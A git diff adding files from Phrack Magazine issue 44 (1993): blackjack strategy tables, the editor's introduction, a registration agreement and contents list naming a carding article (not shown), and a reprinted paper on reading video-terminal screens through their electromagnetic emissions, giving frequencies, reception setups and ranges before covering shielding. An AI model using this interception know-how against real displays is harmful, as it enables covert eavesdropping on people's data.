+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 3,3 | H | H | P | P | P | P | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 4,4 | H | H | H | H | H | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 6,6 | H | P | P | P | P | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 7,7 | P | P | P | P | P | P | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 8,8 | P | P | P | P | P | P | P | P |  P | P |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 9,9 | P | P | P | P | P | S | P | P |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |10,10| S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               H = Hit  S = Stand   D = Double Down   P = Split
+
+
+
+                   Atlantic City Multiple Deck Basic Strategy Table
+
+                                 Dealer's Up-Card
+                Your +---+---+---+---+---+---+---+---+----+---+
+                Hand | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |  8  | H | H | H | H | H | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |  9  | H | D | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 10  | D | D | D | D | D | D | D | D |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 11  | D | D | D | D | D | D | D | D |  D | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 12  | H | H | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 13  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 14  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 15  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 16  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 17  | S | S | S | S | S | S | S |  S | S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,2 | H | H | H | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,3 | H | H | H | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,4 | H | H | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,5 | H | H | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,6 | H | D | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,7 | S | D | D | D | D | S | S | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,8 | S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,9 | S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,A | P | P | P | P | P | P | P | P |  P | P |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 2,2 | P | P | P | P | P | P | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 3,3 | P | P | P | P | P | P | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 4,4 | H | H | H | P | P | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 6,6 | P | P | P | P | P | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 7,7 | P | P | P | P | P | P | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 8,8 | P | P | P | P | P | P | P | P |  P | P |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 9,9 | P | P | P | P | P | S | P | P |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |10,10| S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               H = Hit  S = Stand   D = Double Down   P = Split
+
+
+                 End of "How To Hack BlackJack": File 1 of 2
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
\ No newline at end of file
diff --git a/phrack44/1.txt b/phrack44/1.txt
new file mode 100644
index 0000000..1dd75c9
--- /dev/null
+++ b/phrack44/1.txt
@@ -0,0 +1,338 @@
+                              ==Phrack Magazine==
+
+                   Volume Four, Issue Forty-Four, File 1 of 27
+
+                                 Issue 44 Index
+                              ___________________
+
+                               P H R A C K   4 4
+
+                               November 17, 1993
+                              ___________________
+
+                       ~ Your skill is extra ordinary ~
+
+Happy Birthday to Phrack, Happy Birthday to Phrack, Happy Birthday
+Happy Birthday, Happy Birthday to Phrack.  November 17th, 1993 marks
+the eighth year of Phrack Magazine.  Amazing, ain't it?  Seems like
+only a few years.  Makes me feel old.  Damn.
+
+I have been a busy boy since I put out 43.  I've been to Boston,
+Amsterdam, Las Vegas, Philadelphia, and numerous points in between.
+I've been slaving at the day job, consulting and speaking about
+security on the side, working on other ventures you could not
+possibly conceive of without proper initiation, and piecing together
+this magazine.  (Listening for applause)
+
+It's a big pain in the butt to do a magazine like this, especially
+when people who SAY they are going to write something, don't.  I know,
+it's a typical hacker cop-out to start something and then get
+side-tracked by other projects.  I'm as guilty of that as is any of
+you, but I'm trying to get better.  So should those of you who are
+hiding your faces in shame...you know who you are.
+
+Every day I get bombarded with "When's the next Phrack coming out?"
+It started the day I released 43 on IRC.  THE SAME DAY!  43 hadn't even
+gone out over the mailing list yet, and people were already asking
+when the next one was due out!  I know they didn't read all 1.2
+megs of 43 before they started in on me.  Geez, that gets old.
+For those of you who ever consider asking me such a thing, the answer
+is, "When it's done."
+
+Alas, still no new corporate registrations.  A few people
+have expressed an interest, but never followed through.
+We have gotten a number of non-corporate registrations from
+people who I guess just wanted to send me mail.  Listen
+guys, I love to hear from you all, but unless you are a corporate,
+federal, or law enforcement reader complying with our registration
+requirements and paying the fee, you don't have to send in the form.
+
+We've got a few nifty things in this issue.  Phrack never really
+included much more than text.  Last month's inclusion of the Novell
+utilities uuencoded was a departure from the norm, and I decided to
+do somthing like that again.  In this issue you will find a small
+photo collection that might make you smile.
+
+If you can't figure out how to use uudecode, I suggest
+you close this file, and spend a few moments perusing the man page
+entries on that command, or consulting a good book on unix.  And
+for you whiners that don't have accounts on UNIX boxes, uuencode
+and uudecode programs are available for DOS, Mac, Amiga and
+virtually any platform you care to use.  (Although if you are using
+MVS, CICS, TSO or 400/OS, you reap what you sow.)
+
+A lot of conferences went on during the time that has passed since our
+last issue.  It's nice to see that the community is making itself
+a louder voice in the world, although seeing the word "Cyber" on
+nearly every magazine in the Western Hemisphere is making me
+rather nauseous, and if Billy Idol gets on another TV show (aside from
+The Hollywood Squares, which would mean his career was OVER)
+I may have to sell everything electronic I own.  Hell, there
+was even hacking on Melrose Place.  Anyway, back to the point, as is
+the case with every gathering, we've got it covered.
+
+You might notice that there are a lot of files dealing with people
+and places rather than strictly items of hardcore technical info.
+I know some may disagree with me, but I really feel that its
+important to document and chronicle things that relate to the
+personalities of this community.  I mean, how entertaining is it
+to read "HOW TO HACK TOPS-20" ten years later?
+
+Don't get me wrong and think we're not dealing with anything meaty.
+This issue we've also got operating system guides, cell & bell stuff,
+Van Eck info, and MORE MORE MORE.
+
+Phrack 44.  It's out.  Now leave me alone.  :)
+
+-------------------------------------------------------------------------
+
+                        READ THE FOLLOWING
+
+                IMPORTANT REGISTRATION INFORMATION
+
+Corporate/Institutional/Government:  If you are a business,
+institution or government agency, or otherwise employed by,
+contracted to or providing any consultation relating to computers,
+telecommunications or security of any kind to such an entity, this
+information pertains to you.
+
+You are instructed to read this agreement and comply with its
+terms and immediately destroy any copies of this publication
+existing in your possession (electronic or otherwise) until
+such a time as you have fulfilled your registration requirements.
+A form to request registration agreements is provided
+at the end of this file.  Cost is $100.00 US per user for
+subscription registration.  Cost of multi-user licenses will be
+negotiated on a site-by-site basis.
+
+Individual User:  If you are an individual end user whose use
+is not on behalf of a business, organization or government
+agency, you may read and possess copies of Phrack Magazine
+free of charge.  You may also distribute this magazine freely
+to any other such hobbyist or computer service provided for
+similar hobbyists.  If you are unsure of your qualifications
+as an individual user, please contact us as we do not wish to
+withhold Phrack from anyone whose occupations are not in conflict
+with our readership.
+
+_______________________________________________________________
+
+Phrack Magazine corporate/institutional/government agreement
+
+   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
+AGREEMENT.  Company's use and/or possession of this Magazine is
+conditioned upon compliance by company with the terms of this
+agreement.  Any continued use or possession of this Magazine is
+conditioned upon payment by company of the negotiated fee
+specified in a letter of confirmation from Phrack Magazine.
+
+   This magazine may not be distributed by Company to any
+outside corporation, organization or government agency.  This
+agreement authorizes Company to use and possess the number of copies
+described in the confirmation letter from Phrack Magazine and for which
+Company has paid Phrack Magazine the negotiated agreement fee.  If
+the confirmation letter from Phrack Magazine indicates that Company's
+agreement is "Corporate-Wide", this agreement will be deemed to cover
+copies duplicated and distributed by Company for use by any additional
+employees of Company during the Term, at no additional charge.  This
+agreement will remain in effect for one year from the date of the
+confirmation letter from Phrack Magazine authorizing such continued use
+or such other period as is stated in the confirmation letter (the "Term").
+If Company does not obtain a confirmation letter and pay the applicable
+agreement fee, Company is in violation of applicable US Copyright laws.
+
+    This Magazine is protected by United States copyright laws and
+international treaty provisions.  Company acknowledges that no title to
+the intellectual property in the Magazine is transferred to Company.
+Company further acknowledges that full ownership rights to the Magazine
+will remain the exclusive property of Phrack Magazine and Company will
+not acquire any rights to the Magazine except as expressly set
+forth in this agreement.  Company agrees that any copies of the
+Magazine made by Company will contain the same proprietary
+notices which appear in this document.
+
+    In the event of invalidity of any provision of this agreement,
+the parties agree that such invalidity shall not affect the validity
+of the remaining portions of this agreement.
+
+    In no event shall Phrack Magazine be liable for consequential, incidental
+or indirect damages of any kind arising out of the delivery, performance or
+use of the information contained within the copy of this magazine, even
+if Phrack Magazine has been advised of the possibility of such damages.
+In no event will Phrack Magazine's liability for any claim, whether in
+contract, tort, or any other theory of liability, exceed the agreement fee
+paid by Company.
+
+    This Agreement will be governed by the laws of the State of Texas
+as they are applied to agreements to be entered into and to be performed
+entirely within Texas.  The United Nations Convention on Contracts for
+the International Sale of Goods is specifically disclaimed.
+
+    This Agreement together with any Phrack Magazine
+confirmation letter constitute the entire agreement between
+Company and Phrack Magazine which supersedes any prior agreement,
+including any prior agreement from Phrack Magazine, or understanding,
+whether written or oral, relating to the subject matter of this
+Agreement.  The terms and conditions of this Agreement shall
+apply to all orders submitted to Phrack Magazine and shall supersede any
+different or additional terms on purchase orders from Company.
+
+_________________________________________________________________
+
+            REGISTRATION INFORMATION REQUEST FORM
+
+
+We have approximately __________ users.
+
+Enclosed is  $________
+
+We desire Phrack Magazine distributed by (Choose one):
+
+Electronic Mail: _________
+Hard Copy:       _________
+Diskette:        _________  (Include size & computer format)
+
+
+Name:_______________________________  Dept:____________________
+
+Company:_______________________________________________________
+
+Address:_______________________________________________________
+
+_______________________________________________________________
+
+City/State/Province:___________________________________________
+
+Country/Postal Code:___________________________________________
+
+Telephone:____________________   Fax:__________________________
+
+
+Send to:
+
+Phrack Magazine
+603 W. 13th #1A-278
+Austin, TX 78701
+-----------------------------------------------------------------------------
+
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+
+      Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
+                3L33t : CERT  (not)
+                 News : Datastream Cowboy
+          Photography : dFx
+      Three People KL
+   Says "Never Trust" : Erik Bloodaxe, Dispater, Control C
+             Dead Guy : River Phoenix
+    Prison Consultant : Co / Dec
+   Gamblers Anonymous : KevinTX
+       Takes Too Long
+      To Make Xeroxes : Count Zero
+       Group To Watch : PoP/FoF
+                Dazed : Weevil
+               Typist : DDS
+              My Hero : Lazlo Toth
+            Thanks To : The Grimmace, Agent 005, Iceman
+                        Herd Beast, Al Capone, Synapse,
+                        Opticon the Disassembled, Holz,
+                        Gurney Halleck, Dark Tangent, Visionary
+                        Paco @ Fringeware, VaxBuster
+                        Larry Kollar, Sara Gordon, Kohntark,
+                        FyberLyte, InterPACT Press, Netsys,
+                        The WELL, MOD, Gail, Hack-Tic.
+
+"Aitsu, satsu ni tarekondari shitara bukkoroshite yaru!"
+  -- A Paranoid Haiteku-Otaku
+
+Phrack Magazine V. 4, #44, November 17, 1993.     ISSN 1068-1035
+Contents Copyright (C) 1993 Phrack Magazine, all rights reserved.
+Nothing may be reproduced in whole or in part without written
+permission of the Editor-In-Chief.  Phrack Magazine is made available
+quarterly to the amateur computer hobbyist free of charge.  Any
+corporate, government, legal, or otherwise commercial usage or
+possession (electronic or otherwise) is strictly prohibited without
+prior registration, and is in violation of applicable US Copyright laws.
+To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
+the list.
+
+                    Phrack Magazine
+                    603 W. 13th #1A-278       (Phrack Mailing Address)
+                    Austin, TX 78701
+
+                    ftp.netsys.com            (Phrack FTP Site)
+                    /pub/phrack
+
+                    phrack@well.sf.ca.us      (Phrack E-mail Address)
+
+Submissions to the above email address may be encrypted
+with the following key : (Not that we use PGP or encourage its
+use or anything.  Heavens no.  That would be politically-incorrect.
+Maybe someone else is decrypting our mail for us on another machine
+that isn't used for Phrack publication.  Yeah, that's it.   :) )
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3a
+
+mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
+ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
+a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
+tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
+=q2KB
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+  -= Phrack 44 =-
+ Table Of Contents                                       Approx. Size
+ ~~~~~~~~~~~~~~~~~                                       ~~~~~~~~~~~~
+ 1.  Introduction by The Editor                               16K
+ 2.  Phrack Loopback / Editorial                              57K
+ 3.  Line Noise Part I                                        51K
+ 4.  Line Noise Part II                                       35K
+ 5.  Computer Cop Prophile by The Grimmace                    22K
+ 6.  Conference News Part I by Various Sources                55K
+ 7.  Conference News Part II by Various Sources               35K
+ 8.  Conference News Part III by Various Sources              50K
+ 9.  Intro to Packet Radio by Larry Kollar                    16K
+ 10. The Moeller Papers                                       30K
+ 11. Sara Gordon v. Kohntark Part I                           12K
+ 12. Sara Gordon v. Kohntark Part II                          47K
+ 13. Northern Telecom's FMT-150B/C/D by FyberLyte             16K
+ 14. A Guide to Data General's AOS/VS Part I by Herd Beast    46K
+ 15. A Guide to Data General's AOS/VS Part II by Herd Beast   50K
+ 16. An Interview With Agent Steal by Agent 005               14K
+ 17. Visionary - The Story About Him by Visionary             23K
+ 18. Searching The Dialog Information Service by Al Capone    48K
+ 19. Northern Telecom's SL-1 by Iceman                        30K
+ 20. Safe and Easy Carding by VaxBuster                       18K
+ 21. Datapac by Synapse                                       36K
+ 22. An Introduction to the Decserver 200 By Opticon          16K
+ 23. LOD Communications BBS Archive Information               29K
+ 24. MOD Family Portrait                                      35K
+ 25. Gail Takes A Break                                       49K
+ 26. International Scenes by Various Sources                  25K
+ 27. Phrack World News by Datastream Cowboy                   22K
+
+                                                    Total:   882K
+
+     People who don't get the picture:
+
+     "Clipper products may not be usable around the world."
+     (NIST Advisory Board, August, 1993)
+
+     "Coin stations not served by the TSPS/TOPS ACTS system are
+     subject to considerable fraud and operating expense."
+     (TE&M, p. 58, September 1, 1993)
+
+     " 'Our basic objective is to detect toll-fraud and prevent customers
+     from suffering large losses,' said AT&T's (Karen) Pepe. 'We're
+     just trying to stay ahead of the curve.'"
+     (Telephony, p. 13, August 30, 1993)
+
+     People who get the picture:
+     
+     "I don't like things that suck."
+     (Butthead, to Beavis, Every Day, 1993)
+
+_______________________________________________________________________________
diff --git a/phrack44/10.txt b/phrack44/10.txt
new file mode 100644
index 0000000..6870c6d
--- /dev/null
+++ b/phrack44/10.txt
@@ -0,0 +1,597 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 10 of 27
+
+****************************************************************************
+
+[Editor's Note:  This file is reprinted with permission of InterPact
+ Press.  The actual document contains many pictures, charts, and tables
+ that due to our format, we were unable to reproduce.  We encourage the
+ reader to contact InterPact Press at 813-393-6600 and order a hard copy
+ of the document for $25.00]
+
+-------------------------------------------------------------------------------
+
+Protective Measures Against Compromising Electro Magnetic Radiation
+Emitted by Video Display Terminals
+
+by Professor Erhart Moller
+University of Aachen, Aachen, Germany
+
+
+0. Introduction
+
+Compromising electromagnetic radiation emitted by machinery or
+instruments used in data processing or communication engineering can be
+received, decoded and recorded even across large distances.  It is also
+possible to recognize the data or information which was processed and
+transmitted by the emitting instrument as text in clear.  Compromising
+emitted electromagnetic radiation thus jeopardizes the protection and
+security of data.
+
+The Laboratory for Communication Engineering at the Fachhochschule
+Aachen is developing protective measures against compromising emission
+of radiation.  However, these protective measures can only be effective
+if they are derived from the characteristics, the effects, and risks of
+compromising emitted electromagnetic radiation.  Therefore we first
+consider only the forms of appearance and the characteristics of
+compromising emitted electromagnetic radiation.
+
+1.  Compromising Emitted Electromagnetic Radiation
+
+In this context one often refers only to the so-called computer
+radiation.  But this is only one form of compromising emitted
+electromagnetic radiation.  There are three types of such emissions.
+
+1.1.  Types of Compromising Emitted Electromagnetic Radiation
+
+Figure 1.1 shows an n example of an arbitrary electric device with various
+electric connections:  a power supply line, a high frequency coaxial
+transmission line, and a coolant line with in- and outflux.  This device
+emits three types of compromising electromagnetic radiation:
+
+1.  electromagnetic radiation in form of electric and magnetic fields
+    and electromagnetic waves;
+
+2.  electromagnetic waves on the outer surface of all coaxial metallic
+    connections (shell waves);
+
+3.  electric interference currents and interference voltages in power
+    lines connected to the device.
+
+Each of the three types can be transformed into the other two.  For
+instance, shell waves can be emitted as fields or waves.  On the other
+hand, electromagnetic waves can be caught by a nearby conductor and can
+propagate on it as shell waves.  These phenomena are the reason for the
+difficult control of compromising electromagnetic radiation, and they
+imply that one must deal with all and not just one form of compromising
+electromagnetic radiation.  Also, electromagnetic protection against
+compromising emitted radiation must deal with all forms of it.
+
+1.2. Examples of Compromising Emitted Electromagnetic Radiation
+
+To exemplify the three types of compromising electromagnetic radiation
+we consider the monitor depicted in figure 1.2.
+
+1.2.1.  Compromising Electromagnetic Radiation
+
+Figure 1.3. shows the experimental set-up.  The video display
+terminal is connected via the power line to the power supply.  The
+power line is surrounded by absorbers so that the terminal can only emit
+electromagnetic radiation.  The absorbers prevent the generation of
+shell waves on the power line.  The dipole antenna of the television
+receiver is 10 m from the video terminal.  Figure 1.4. shows the screen
+of the television receiver after it received and decoded the signal.
+Not only is the large FH=AC well readable but also the smaller letters.
+
+This demonstration yields the following results:
+
+*  The video display terminal emits electromagnetic radiation;
+
+*  Despite being within (standards committee) norms the emitted
+   electromagnetic radiation can be received and decoded across a certain
+   distance;
+
+*  The electromagnetic radiation emitted by the terminal can be decoded
+   into readable information and symbols on a television screen.
+   Therefore, this emitted radiation is compromising.
+
+1.2.2.  Compromising Surface or Shell Waves
+
+The video display terminal and the television receiver are positioned as
+in figure 1.5.  The power line of the terminal is surrounded by a
+current transformer clamp which absorbs the shell waves.  The television
+screen shows again the picture seen in figure 1.4.  The quality of the
+picture is often better than in the previous case.  Another experiment
+would demonstrate that secondary shell waves can form on a nearby
+conductor.  The emitted radiation is then caught by nearby conductors
+and continues to propagate as shell waves.  These emissions also give
+good receptions but are almost uncontrollable along their path of
+propagation.
+
+1.2.3.   Demonstration of Compromising Emitted Radiation Through the
+Power Line
+
+Figure 1.6 shows the experimental set-up for the proof of compromising
+power supply voltages.  The video display terminal acts as a generator
+whose current and voltage is entered into the power supply.  Using a
+capacitive line probe, the entered signal can be retrieved and fed into
+the television receiver.
+
+This form of transmission is the known basis for intercom systems or
+so-called babysitter monitors where the signals are transmitted from
+room to room via the energy supply lines in a home.  As in the case
+of electromagnetic radiation or shell waves, one obtains the same
+picture quality as in figure 1.4.
+
+2.  Facts About Compromising Emitted Radiation
+
+Protective measures against compromising emitted radiation are not only
+determined by the above-mentions\ed three types of compromising
+emissions but also by taking into account the following data:
+#    level of intensity and spectral distribution;
+#    frequency (emission frequency) and frequency range;
+#    directional characteristics of the radiation.
+These data can then be used to derive the damping and the
+amplitude-frequency response for the protective measure and its
+location.
+
+2.1.  Emission Spectrum and Level of Intensity
+
+The spectral distribution of compromising emitted radiation depends on
+the frequencies used to generate the picture on a screen.  The regular
+repetition of dots and lines gives rise to the video and line frequency
+which is found in the spectrum.  However, the emission of video or line
+frequencies is not compromising since their knowledge does not yet give
+access to processed data.  If the lines are covered regularly by
+symbols, a symbol frequency is obtained which is also detectable in the
+spectrum.  A single symbol consists of a dot or pixel matrix.
+
+The dot matrix of the symbol @ is also known in figure 2.1  The electron
+beam scans the individual dots or pixels line-by-line and keys them
+bright or dark.  This keying is done using the so-called dot or pixel
+frequency.  For instance, the highest keying frequency is obtained by
+scanning the center of the @ symbol since there one has a long sequence
+of successive bright and dark pixels.  It also follows from figure 2.1
+that the keying is slower, i.e., the keying frequency is lower, along
+the upper part of the @ symbol because of a long sequence of only dark
+or bright pixels.  It follows that the emissions due to the keying
+frequency are highly compromising since they give direct information
+about the structure of the picture.
+
+Until recently, the frequencies in the following table were used:
+
+        video frequency             45  Hz - 55 Hz
+        line frequency              10 kHz - 20 kHz
+        symbol frequency             2 MHz -  5 MHz
+        dot or pixel frequency      15 MHz - 20 MHz.
+
+The pulses for the electron beam are formed in the video part, i.e., the
+video amplifier, of the monitor.  Therefore, the cathode-grid of the
+picture tube and the video amplifier are the main emitters of radiation.
+The upper diagram in figure 2.2 shows the calculated spectrum for the
+cathode-keying.  It represents a sequence of dots from the center of the
+@ symbol using a dot-sequential frequency of 18 MHz.  The diagram in the
+center of figure 2.2 shows the measured spectrum at the keyed cathode of
+the picture tube.  The agreement between the calculated and measured
+spectrum for the frequency is clearly visible.  However, the calculated
+and measured spectral representation differ in the form of the envelopes.
+In the measured spectrum one finds an amplitude increase between 175 MHz
+and 225 MHz.  This increase is usually found in the same or similar form
+in monitors.  The reasons for this amplitude increase are design,
+construction parts, and dimensions of the video display terminal.  In
+the lower part of figure 2.2 we see the compromising radiation emitted by
+the terminal as measured at a distance of 10 m.  The spectrum of the
+radiation emitted by the terminal is superimposed by broadcast, radio
+and interference spectra since the measurement took place on open
+ground.  Despite this interference one can recognize the typical form of
+the cathode spectrum.  The increase in the amplitude between 175 MHz
+and 225 MHz presents a particular risk since the television transmitters
+for Band III operate within this frequency range and all television sets are
+tuned to it (see figure 2.2).
+
+A comparison of the intensity level of the television transmitter with the
+level of the compromising radiation in figure 2.2 shows their agreement.
+It is therefore not very difficult to receive the compromising radiation in
+proximity of the emitter using only a regular television set with normal
+sensitivity.
+
+Figure 2.3 shows the spectral distribution of compromising shell waves
+emitted by the video display terminal.  Here again one recognizes the
+particular form of the dot or pixel frequency.  The height of the shell wave
+spectrum is much lower at higher frequencies than the height of the
+radiation spectrum.  The shell waves have lower intensity in the range of
+broadcast television but higher intensity in the range of cable television.
+To receive the shell waves a television set must be cable-ready.
+
+Figure 2.4 shows the spectrum for the third type of emission:  the
+compromising currents and voltages entering the power supply lines.  It
+is very similar to the shell wave spectrum.  The height of this spectrum at
+higher frequencies is even smaller than the shell wave spectrum.  In
+order to receive any signal a cable-ready television set must be used.
+The intensity of the currents and voltages is so high that they can
+easily be received using a regular television set with normal
+sensitivity.
+
+2.2.  Frequency and Frequency Range
+
+It follows from figures 2.2, 2.3, and 2.4 that the best reception for
+the three types of emissions is for the following frequencies:
+
+        compromising radiation      approx. 200 MHz;
+        compromising shell waves    approx. 60 MHz;
+        compromising voltages       approx. 20 MHz.
+
+The video information of the picture on the monitor has a frequency
+range of half a spectral arc.  The frequency range of the receiver must
+therefore be 10 MHz for all three types of emission.
+
+2.3.  Directional Characteristics of the Radiation
+
+Figure 2.5 shows the directional characteristics for compromising
+radiation emitted by a video display terminal inside a plastic casing.
+According to this diagram the lateral radiation dominates.  The field
+intensity along the front and back direction is about 30% of the lateral
+intensity.  The power of the emitted radiation along these directions is
+only about 10% of the power emitted laterally.  The range for the
+emitted radiation along the front and back direction is therefore also
+reduced to 30%.  This phenomenon suggests for the first time a
+protection against compromising radiation, namely proper positioning of
+the device.
+
+The compromising shell waves and power line voltages propagate according
+to the configuration of the lines.  There is no preferred direction.
+
+2.4.  Range
+
+The range of compromising radiation emitted from a video display
+terminal is defined as the maximum distance between the emitting
+terminal and a television receiver and readable picture.
+
+The range can be very different for the three types of emitted
+radiation.  It depends on the type of emitter and the path of
+propagation.
+
+The spectacular ranges for emitted ranges are often quoted - some of
+which do not always come from the technical literature - give in general
+no indication just under which conditions they were obtained.  It is
+therefore meaningful to verify these spectacular ranges before using
+them.
+
+2.4.1.  The Range of Compromising Emitted Radiation
+
+The dependence of the field intensity on distance is illustrated in
+figure 2.6.
+
+The dependence of the range on the receiver used is shown at 25 m, 40 m,
+and 80 m.  The field intensity  at 25 m is just strong enough to receive
+a picture with an ordinary television receiver using the set-up in figure
+1.3.  If one uses a narrow-band television antenna or a noiseless antenna
+amplifier than the field intensities at 40 m and 80 m, respectively, are
+still strong enough to receive a legible picture.
+
+The flattening out of the curve at large distances suggests that the
+range can be increased to several hundred meters by using more sensitive
+antenna or better receivers.  The range can also be increased through a
+high altitude connection, for instance, if both emitter and receiver are
+in or on a high rise.  This was verified by an experiment involving two
+high rises separated by over 150 m.  A very clear picture was received
+using a relatively simple antenna with G = 6 db.
+
+2.4.2.  Range of Compromising Shell Waves
+
+Measurements have shown that shell waves can propagate across a large
+area without any noticeable damping if only the surrounding metallic
+conductors extend also across the entire area.
+
+The propagation is reduced considerably by a metallic conductor that
+crosses metallic surfaces such as metal walls or metallic grids such as
+reinforcements in concrete walls.
+
+Dissipative building materials also damp shell waves.  Lightweight
+construction such as the use of dry walls or plastic walls in large
+buildings increases the range of shell waves to about 100 m without the
+picture becoming illegible.
+
+2.4.3  Range of Emissions Through Power Supply Lines
+
+In this case the conditions are even less clear than in the previous
+cases.  It must be assumed that inside a building the compromising
+currents and voltages can be received through the phase of the power
+supply lines feeding the video display terminal .  The possibility of
+receiving the signal through other phase lines by coupling across phases
+in the power supply line cannot be excluded.
+
+The range depends very much on the type of set-up and the instruments
+used.  It is conceivable that a range of about 100 m can be obtained.
+
+3.  Protective Measures
+
+Protective measures fall into three categories:
+
+    -   modification of devices and instruments by changing procedures
+        and circuitry;
+    -   heterodyning by noise or signals from external sources;
+    -   shielding, interlocking, and filtering.
+
+3.1.  Instrument Modification
+
+The instrument modifications consist of changing the signal processing
+method and the circuitry of the instrument.  It is the objective of
+these measures to alter the spectral distribution and intensity of the
+emitted radiation in such a way that the reception by television sets or
+slightly modified television sets is no longer possible.
+
+For instance, a change of procedure could consist of a considerable
+increase in the dot or pixel frequency, the symbol and line frequencies.
+A reduction in the impulse amplitude and impulse slope also changes the
+reduction in the impulse slope also changes emission spectrum so that
+reception is rendered more difficult.  However, the subsequent
+modification of the video display terminal has serious disadvantages of
+its own: First of all, the user of video display terminals does in
+general not possess the personal and apparative equipment to perform the
+modifications.  To complicate things further, the so-modified
+instruments loose their manufacturer's warranty and also their permit of
+operation issued by governmental telecommunication offices.  A subsequent
+instrument modification by the user is for these reasons in general out
+of question.
+
+3.2. HETERODYNING STRATEGY
+
+We refer to a protective measure as a heterodyning strategy whenever the
+compromising emitted radiation is superimposed by electromagnetic noise
+of specific electromagnetic signals.
+
+The television set receives the compromising emitted radiation together
+with the superimposed noise of spurious signal.  The noise or the
+spurious signal are such that a filtering out or decoding of the
+compromising emitted radiation by simple means is impossible.
+
+Since the noise and the spurious signal not only interfere with the
+television receiver of the listener but also with other television sets
+in the vicinity the heterodyning strategy is by all means in violation
+with the laws and regulations governing telecommunications.  As far as
+is known, this is a protective measure only used under extremely
+important circumstances involving high government officials.
+
+3.3  Shielding
+
+In contrast to the previously considered protective measures, shielding
+has two important advantages:
+
+*   shielding protects not only against compromising emitted radiation
+    but also against electromagnetic emissions which can enter data
+    processing devices from the outside and cause interference;
+*   furthermore, shielding neither violates the laws governing the use
+    of telecommunications nor does it jeopardize the manufacturer's
+    warranty.
+The term shielding is used here to describe, shielding, interlocking,
+and filtering.
+
+3.3.1.  Shielding Data
+
+The requirements on a shield are described by the shield damping.  The
+shield damping is twenty times the logarithm of the ratio between the
+electric or magnetic field intensity inside the shield and outside the
+shield.
+
+Actual applications and individual situations may require different
+values for the shield.  The shield data are derived from the so-called
+zone model.  In the zone model one considers the type and intensity of
+the emitted radiation, the composition of the path of propagation, and
+the local accessibility for the receiver.
+
+The shield data not only influence the shield damping but also the
+frequency range of the shield's effectiveness.  Figure 3.1 shows a
+diagram listing different types if shields according to regulations MIL
+STD 285 and 461B, NSA 656, and VG norms 95 375.
+
+3.3.2.  Applicability of Shielding
+
+Electromagnetic shielding can be used on emitting or interfered with
+instruments, on building and rooms, and on mobile cabins.
+
+3.3.2.1.  Shielding of Instruments
+
+The shielding of instruments though it can often be done very quickly
+and effortlessly is not without problems.
+
+In general but especially after subsequent installation, it can lead to
+a loss in design and styling of the shielded device.  Openings in the
+shield, for instance for ventilation or control and operating elements,
+cannot always be sealed off completely.  In this  case they are emission
+openings with particularly high emission rates.
+
